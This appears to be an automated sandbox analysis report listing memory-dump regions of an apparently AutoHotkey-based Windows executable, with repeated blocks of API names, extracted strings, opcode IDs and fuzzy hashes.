                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Timer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2870079774-0
                                                                                                                                                                              • Opcode ID: 847f8c0426e92bc9827668e93a4bc67dd1ad98c0c2474724ebb27db151836c5f
                                                                                                                                                                              • Instruction ID: 8aba855fc39ae96317f24178c565778b6144ec4c3c26da3c11208225e16f31a4
                                                                                                                                                                              • Opcode Fuzzy Hash: 847f8c0426e92bc9827668e93a4bc67dd1ad98c0c2474724ebb27db151836c5f
                                                                                                                                                                              • Instruction Fuzzy Hash: 88B17F73A14BC486E712CB2DD5113E837A0F7ADB88F19A219EF8813672DB7992D5D300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClipboardCloseCurrentEnumGlobalProcessTimerWindowsWire
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2048928095-0
                                                                                                                                                                              • Opcode ID: e5d6583fd667b9c07311e56bac20e6c288734c1e76d70f26e7c0a6b8fe693c79
                                                                                                                                                                              • Instruction ID: cf738602aec9955a2b9866775376a2927456525f6e17eb2ab5f901b1addf16f8
                                                                                                                                                                              • Opcode Fuzzy Hash: e5d6583fd667b9c07311e56bac20e6c288734c1e76d70f26e7c0a6b8fe693c79
                                                                                                                                                                              • Instruction Fuzzy Hash: 202123B9204B8296EB22CF57B8803C963A4F78CBD5F490522EB8943A39DF78C445CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCodeCountExitHandleProcessTick
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 1079426074-2978689999
                                                                                                                                                                              • Opcode ID: 81de085af4b8d7b7ce8772fb8a60fa8df252afc2c48cfbfc07ef698c89b20474
                                                                                                                                                                              • Instruction ID: befe47d2d1826470ff676243a2d6f69bb9c9af6f52caeb5d1b6818dd6739d6ff
                                                                                                                                                                              • Opcode Fuzzy Hash: 81de085af4b8d7b7ce8772fb8a60fa8df252afc2c48cfbfc07ef698c89b20474
                                                                                                                                                                              • Instruction Fuzzy Hash: 0B318E76208A8085E727DF16F4543EA7760F78DBD5F444006EB9983BA9DE78C186CB01
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageThread$Post$CountCreateHookPeekPriorityQuitSleepTickUnhookUnregisterWindows
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3108639398-0
                                                                                                                                                                              • Opcode ID: ab47064901ba79550a548394bb8d2e65ca9e29fca641ee7e79c7963518f29370
                                                                                                                                                                              • Instruction ID: d4e500956f65c900aa3683b0eaa447b74d893203a0557032e1a7fc2dc947475d
                                                                                                                                                                              • Opcode Fuzzy Hash: ab47064901ba79550a548394bb8d2e65ca9e29fca641ee7e79c7963518f29370
                                                                                                                                                                              • Instruction Fuzzy Hash: 152139B6305B4486EA5ADF27F8903AA37A1B74DBC0F09412AFB8957B35DB78C0848300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 849950280-2978689999
                                                                                                                                                                              • Opcode ID: b09ff208931aded6893cb8adebfd3e09b0b500a264ee684950dbe79183fd191d
                                                                                                                                                                              • Instruction ID: 3d65b10ed3fef53cda65a0db6dfc4e6fde2eab73fcb4082a5bfabb2b458d76a5
                                                                                                                                                                              • Opcode Fuzzy Hash: b09ff208931aded6893cb8adebfd3e09b0b500a264ee684950dbe79183fd191d
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B415E72708A9486EB67CB17E9503AA67A1F78CBD4F148115FF9943BB9DB38C581C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Text
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 848690642-0
                                                                                                                                                                              • Opcode ID: 383889b9d0e877e3900faacff9037107133782a6b03b4272928bab8488d84dc2
                                                                                                                                                                              • Instruction ID: 98b3345ca6c5c8683ee01e221abaacf50ae80411164ebc8db7185126aa081ace
                                                                                                                                                                              • Opcode Fuzzy Hash: 383889b9d0e877e3900faacff9037107133782a6b03b4272928bab8488d84dc2
                                                                                                                                                                              • Instruction Fuzzy Hash: 12E01A36318A8185EB65CB23A5447A91362F749FD4F494062DE4A53B24CE39C446D704
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FolderPath
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1514166925-0
                                                                                                                                                                              • Opcode ID: 3f7b802eeb271a92ec99a51b5f4ca4c3ead8372490f73c9e0a921ac7d07f7af2
                                                                                                                                                                              • Instruction ID: 780c193537da823559d8037c39f8e71a61e44cb59e4302a7a6e3f89561941bb8
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f7b802eeb271a92ec99a51b5f4ca4c3ead8372490f73c9e0a921ac7d07f7af2
                                                                                                                                                                              • Instruction Fuzzy Hash: 2F31E37121464482E771DB26E5843BA72A0F34C7D0F564232FB9AC36E4EB38ED50E755
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: c07b2ffcb2600a5d5c101b5daa12416307903b8164e914d813a669d8e38c33ac
                                                                                                                                                                              • Instruction ID: 324e69af4226ad03c8392e356ac54f961b6eb8c51379678808530e144f7c43ab
                                                                                                                                                                              • Opcode Fuzzy Hash: c07b2ffcb2600a5d5c101b5daa12416307903b8164e914d813a669d8e38c33ac
                                                                                                                                                                              • Instruction Fuzzy Hash: 1AF0F974701B0581FE5A5FE759613E513A55BCDBC0F885434AB0AC76EADD7CC9914220
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: 8bfbf4ebb751c2b3a4726173152b125ffe8becc0d6eb46bee45a53f47e974557
                                                                                                                                                                              • Instruction ID: a09f980ce5acc2075d3f54a5461a58f957e2c1edcaa9b8dab6f59b903451e37f
                                                                                                                                                                              • Opcode Fuzzy Hash: 8bfbf4ebb751c2b3a4726173152b125ffe8becc0d6eb46bee45a53f47e974557
                                                                                                                                                                              • Instruction Fuzzy Hash: 15F08C30705A0585FA6A6FF369003E952B05BCC7E0F8806207F26C72FADA78C4914660
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: ef6dcc2d0c50af96da0f8d56621ec547e32a07f1962af12f04a5feea29d38d47
                                                                                                                                                                              • Instruction ID: e1b6980e9d656404c5a452de2f1f541a265dbda38d5e6c6e91350b65a1da03c7
                                                                                                                                                                              • Opcode Fuzzy Hash: ef6dcc2d0c50af96da0f8d56621ec547e32a07f1962af12f04a5feea29d38d47
                                                                                                                                                                              • Instruction Fuzzy Hash: B4F01C72701B0082E796DB62F45139932E4E79CB94F441238FB9D4B3A6EB78C5E18B50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                              • Opcode ID: 6fc85b3580835e98fb09a58a5c52ff5b9e4df9d67572389d0d8803bb9369c85e
                                                                                                                                                                              • Instruction ID: 24ba58874aaf3f9c0fcab318f362237076b53426722e46ab87c03a0d12b4d261
                                                                                                                                                                              • Opcode Fuzzy Hash: 6fc85b3580835e98fb09a58a5c52ff5b9e4df9d67572389d0d8803bb9369c85e
                                                                                                                                                                              • Instruction Fuzzy Hash: 36D0A73670831082E7169B2AF251FADA331EB8DBD0F040411AF0A1BFA9CE3AC0908B00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _onexit
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 572287377-0
                                                                                                                                                                              • Opcode ID: e2b4c18f64ce57a15ec4f57ef9f4ec757584625dab262b2aa3dc023fd5334ed6
                                                                                                                                                                              • Instruction ID: 68e3f7fef4050f4f7c37b3d3b486175a67bcbd1aa484210f50333c3c6284a92e
                                                                                                                                                                              • Opcode Fuzzy Hash: e2b4c18f64ce57a15ec4f57ef9f4ec757584625dab262b2aa3dc023fd5334ed6
                                                                                                                                                                              • Instruction Fuzzy Hash: 75C04C35F5750AD1E919B77B89863E4115057BE790F900712A30AC26B1D82C82E75E01
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressGlobalLoadProc$FileImage$CloseFreeHandleLibraryObject_invalid_parameter_noinfo$CopyCursorDeleteDestroy$AllocAttributesCreateIconInfoLockPictureReadSizeWire
                                                                                                                                                                              • String ID: *$:$GdipCreateBitmapFromFile$GdipCreateHBITMAPFromBitmap$GdipDisposeImage$GdiplusShutdown$GdiplusStartup$ani$bmp$cpl$cur$dll$exe$gdiplus$gif$hbitmap:$hicon:$icl$ico$jpeg$jpg$scr
                                                                                                                                                                              • API String ID: 2878876949-1932607546
                                                                                                                                                                              • Opcode ID: 7222251442592e42b806a6b82dcb0bc59407b22abb7a5c0692554d2771f97951
                                                                                                                                                                              • Instruction ID: 52be1733a15ea0bde01f0c7c033ecd9cd0d93f22d1565ac8b07fd55dc475d5ce
                                                                                                                                                                              • Opcode Fuzzy Hash: 7222251442592e42b806a6b82dcb0bc59407b22abb7a5c0692554d2771f97951
                                                                                                                                                                              • Instruction Fuzzy Hash: 84326A72705B408AFB36DB7795143ED23A1BB8DBD8F140121EF1A67AA8EF38C5458740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountThreadTick$HandleWindow$AsyncCloseProcessState$AddressAttachCreateCurrentErrorForegroundInputKeyboardLastLayoutMessageModuleMutexPeekProc_invalid_parameter_noinfo
                                                                                                                                                                              • String ID: AHK Keybd$BlockInput$MZ@$^+!#{}$user32${Blind}${Click
                                                                                                                                                                              • API String ID: 2830014824-1839110423
                                                                                                                                                                              • Opcode ID: 89364f871534d9de5765a3895343cbc526a7563b6f8ef967bc05b754334ada43
                                                                                                                                                                              • Instruction ID: acbd38619320472efa090a05506fdefc559966d14e8f675a5f8acae403373134
                                                                                                                                                                              • Opcode Fuzzy Hash: 89364f871534d9de5765a3895343cbc526a7563b6f8ef967bc05b754334ada43
                                                                                                                                                                              • Instruction Fuzzy Hash: E75201B12046908AF727DF27E8503EA37A1A74D798F44811AF7964BAF1DBBDC444EB10
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CreateSystem$Metrics$FontObject$ButtonCapsCheckedClientDeleteDestroyDeviceEnumFaceFamiliesInfoParametersRectSelectShowStockText
                                                                                                                                                                              • String ID: AutoHotkey2$DISPLAY$Segoe UI$static
                                                                                                                                                                              • API String ID: 1018824971-4085670783
                                                                                                                                                                              • Opcode ID: 9f0444f16d69fe4c83139f35306d4350fff10ba374ea6ce7a18a7e2f8d8f315e
                                                                                                                                                                              • Instruction ID: e1b9f45801e3b1b59fe678d5adf9e700dc20d82d00dd8f8172f153c9933aedf8
                                                                                                                                                                              • Opcode Fuzzy Hash: 9f0444f16d69fe4c83139f35306d4350fff10ba374ea6ce7a18a7e2f8d8f315e
                                                                                                                                                                              • Instruction Fuzzy Hash: D2915E762087808AE766CF66E8907DAB7A5F78CB94F544119EB8A43B78DF3CD544CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: MZ@$Match$Max$NewInput$Out of memory.$Timeout$V$V$sc%03X$vk%02X
                                                                                                                                                                              • API String ID: 0-301772239
                                                                                                                                                                              • Opcode ID: 51661bb2cf983b565cfd099b713ffa3f709133dbbddd0663a07c2ea1ef1524b9
                                                                                                                                                                              • Instruction ID: 9294c36655d55c85db19cf4f4df24185f3301bb979eacf667d95e29a135f9b8a
